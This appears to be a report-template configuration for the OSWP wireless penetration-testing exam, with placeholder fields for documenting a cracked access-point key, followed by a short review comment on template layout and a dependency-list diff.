origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.description]
type = "markdown"
label = "Technical Description"
origin = "predefined"
default = "TODO A brief description of the attack chain with machine names, including the depth of compromise should be included here."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof"
origin = "custom"
default = "TODO Provide the contents of the \"Access Point X\" wireless network key."
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in obtaining the \"Access Point X\" wireless network key. **The steps taken should be able to be easily followed and reproducible if necessary.**"
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide at least one screenshot of the successfully cracked \"Access Point X\" wireless network key and a screenshot of proof.txt."
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSWP Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "Access Point X"
cvss = "n/a"
description = "TODO: A brief description of the attack chain with machine names, including the depth of compromise should be included here."
id = "30fa6ea9-64f0-4b95-a7ff-dcc2e1983d3f"
proof = "TODO Provide the contents of the \"Access Point X\" wireless network key."
steps = "TODO Provide a detailed account of your methodology in obtaining the \"Access Point X\" wireless network key. **The steps taken should be able to be easily followed and reproducible if necessary.**"
screenshots = "TODO Provide at least one screenshot of the successfully cracked \"Access Point X\" wireless network key and a screenshot of proof.txt."
[[assets]]
id = "1b6169aa-b720-4de0-b6ec-3dee7b52ec18"
name = "LICENSE"
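Review bot: In the findings loop of `report_template`, `<markdown :text="finding.description" />` sits before the `<h2 :id="finding.id" class="in-toc numbered">` heading, so each finding's technical description is rendered above its own title instead of inside the numbered section it describes. Unless that ordering is intended, move the description line directly below the `<h2>`, next to the `proof`, `screenshots` and `steps` blocks. The preview value for `description` also starts with `TODO:` while the field default uses `TODO` without the colon, so the preview does not show exactly what a new finding would contain.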

Binary file not shown.

Binary file not shown.


@ -7,4 +7,5 @@ mkdocs-redirects==1.2.1
pymdown-extensions==10.1
requests==2.31.0
pillow==10.1.0
cairosvg==2.7.1
cairosvg==2.7.1
reptor==0.8